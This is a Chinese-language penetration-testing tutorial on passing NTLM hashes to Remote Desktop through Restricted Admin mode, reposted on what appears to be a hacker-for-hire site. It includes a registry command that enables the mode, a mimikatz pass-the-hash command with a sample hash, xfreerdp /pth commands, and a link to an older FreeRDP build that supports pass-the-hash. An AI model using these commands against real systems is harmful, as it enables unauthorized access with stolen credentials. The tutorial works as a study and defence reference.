找黑客平台

渗透技巧——Pass the Hash with Remote Desktop

hacker4年前关于黑客接单443

  渗透技巧——Pass the Hash with Remote Desktop

  在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用Pass the hash的 *** 对WMI和 *** B服务进行登录,那么,Pass the hash能否用于远程桌面呢?这其中有什么限制条件呢?本文将要进行测试并总结。

  关于Pass the hash的利用可参考之前的文章:

  《域渗透——Pass The Hash的实现》

  本文将要介绍以下内容:

  Restricted Admin mode介绍

  Pass the Hash with Remote Desktop的适用条件

  Pass the Hash with Remote Desktop的实现 ***

  官方说明:

  https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/

  本节参照官方说明,加入个人理解,如果有误,欢迎纠正

  Restricted Admin mode,直译为受限管理模式,主要功能是使得凭据不会暴露在目标系统中

  Windows 8.1和Windows Server 2012 R2默认支持该功能

  Windows 7和Windows Server 2008 R2默认不支持,需要安装补丁2871997、2973351

  注:

  相关资料可参考:

  https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2871997

  https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro

   *** 1: 安装补丁3126593

  实现原理同下文的 *** 2(修改注册表)

  参考链接:

  https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro

   *** 2: 修改注册表

  位置:

  新建键值,值为,代表开启;值为,代表关闭

  对应命令行开启的命令如下:

  REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

  客户端命令行:

  mstsc.exe /restrictedadmin

  如果当前系统不支持Restricted Admin mode,执行后弹出远程桌面的参数说明,如下图

  

  如果当前系统支持Restricted Admin mode,执行后弹出远程桌面的登录界面,如下图

  

  值得注意的是,Restricted Admin mode使用当前Windows登录凭据,不需要输入口令,直接登录即可

  注:

  正是这项功能使得Pass the hash的利用有了可能

  更进一步,Pass the Hash with Remote Desktop的前提就是系统支持Restricted Admin mode

  具体的说,Server需要开启Restricted Admin mode,Client需要支持Restricted Admin mode

  注:

  一些资料提到Pass the Hash with Remote Desktop适用于Windows 8.1和Windows Server 2012 R2,这个结论并不确切,准确的说,Windows 7和Windows Server 2008 R2安装补丁后同样适用

  测试环境:

  Server:

  OS: Server2012 R2

  IP: 192.168.62.136

  Computer Name: remoteserver

  User Name: administrator

  NTLM hash: d25ecd13fddbb542d2e16da4f9e0333d

  开启Restricted Admin mode

  Client:

  支持Restricted Admin mode

  实际上为

  需要管理员权限

  mimikatz命令如下:

  privilege::debug

  sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:d25ecd13fddbb542d2e16da4f9e0333d "/run:mstsc.exe /restrictedadmin"

  执行后弹出远程登录界面,如下图

  

  选择,成功实现远程登录

  下载地址:

  https://github.com/FreeRDP

  可供参考的文章:

  https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash/

  https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

  FreeRDP实现了远程桌面协议,支持传入hash

  支持Linux、Windows和MAC,下载地址如下:

  https://github.com/FreeRDP/FreeRDP/wiki/PreBuilds

  linux下使用明文远程登录的参数:

  xfreerdp /u:administrator /p:test123! /v:192.168.62.136 /cert-ignore

  测试成功

  linux下使用hash远程登录的参数:

  xfreerdp /u:administrator /pth:d25ecd13fddbb542d2e16da4f9e0333d /v:192.168.62.136 /cert-ignore

  测试失败

  Windows下也是同样的测试结果

  猜测新版FreeRDP移除了该功能,其他人也有同样的测试结果,链接如下:

  https://nullsec.us/rdp-sessions-with-xfreerdp-using-pth/

  https://twitter.com/egyp7/status/776053410231558148

  补充:

  包含pth功能的旧版FreeRDP的的下载地址:

  https://labs.portcullis.co.uk/download/FreeRDP-pth.tar.gz

  需要重新编译,支持pth参数

  Restricted Admin mode本来是为了提高系统的安全性,但是却支持了Pass the Hash的利用

  所以在防御上,针对Pass the Hash的利用进行防御就好,开启Restricted Admin mode有助于提高系统的安全性

  可参考微软官方文档,地址如下:

  http://www.microsoft.com/en-us/download/details.aspxid=36036

  本文对Pass the Hash with Remote Desktop的 *** 进行了分析,找到了其中的限制条件(Server需要开启Restricted Admin mode,Client需要支持Restricted Admin mode),对Restricted Admin mode的关键部分进行了说明。

  渗透技巧——Pass the Hash with Remote Desktop

  

标签: 渗透测试
返回列表

上一篇:SEO管家中心是什么?SEO管家中心功能有哪些?

下一篇:内网渗透 | 手把手教你如何进行内网渗透

相关文章

印尼社会事务部长涉我们结婚了0914贪被捕 两周内两部长落马

  中新社雅加达12月6日电 (记者 林永传)印尼肃贪委员会(KPK)6日以涉嫌新冠疫情防控之社会援助物资采购中收受贿赂,逮捕了该国社会事务部长巴图巴拉(Juliari Batubara)。巴图巴拉成...

漫盐奶茶营业额大概多少?让大家意想不到的销量和利润

漫盐奶茶营业额大概多少?让大家意想不到的销量和利润

现在生活水平的不断提高,市场上纷纷出现了各种各样的加盟品牌,这是为大家创业提供了加盟品牌加盟项目的大好时机。但是大家也是都了解创业是有风险的,创业的风险是没有办法避免的,但是通过加盟商的仔细寻找好品牌...

只是借口?美国多家大孔从洲企业被曝疫情期间盈利却

  受新冠肺炎疫情影响,美国今年有大量小型企业倒闭,失业人数飙升,社会不平等加剧,数百万美国人陷入贫困。而美国《华盛顿邮报》近日的一个分析报告显示,自今年3月以来,美国最大的50家企业中有45家在疫情...

“短视频种草+直播电商”营销手册,打造品牌全链路视频营销

“短视频种草+直播电商”营销手册,打造品牌全链路视频营销

本文针对直播带货与短视频种草的组合拳实操要领举办拆解,从实操的角度出发,深度辅佐品牌梳理全链条视频营销手段。 2020年,微播易产出了关于“直播带货底层逻辑”、“直播带货反直觉问题”、“直播带货的营...

专业服从调剂什么意思(服从调剂,就会直接被调剂到其他专业?)

专业服从调剂什么意思(服从调剂,就会直接被调剂到其他专业?) 专业调剂: 对于学校而言,是指招生学校录取时某专业录取满额,将剩余考生向有空额的专业调拨。 对于考生而言,是指在所报专业已录满额情况...

深度解析4月3日上市的杭州网红电商第一股!

深度解析4月3日上市的杭州网红电商第一股!

4月3日,美国纳斯达克交易所的电子显示屏上滚动播出“RUHN”字样,来自杭州的网红电商杭州如涵控股股份有限公司(下称如涵控股)成为中国网红电商第一股,网红张大奕也神采奕奕地在微博和网友分享了她的喜悦。...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.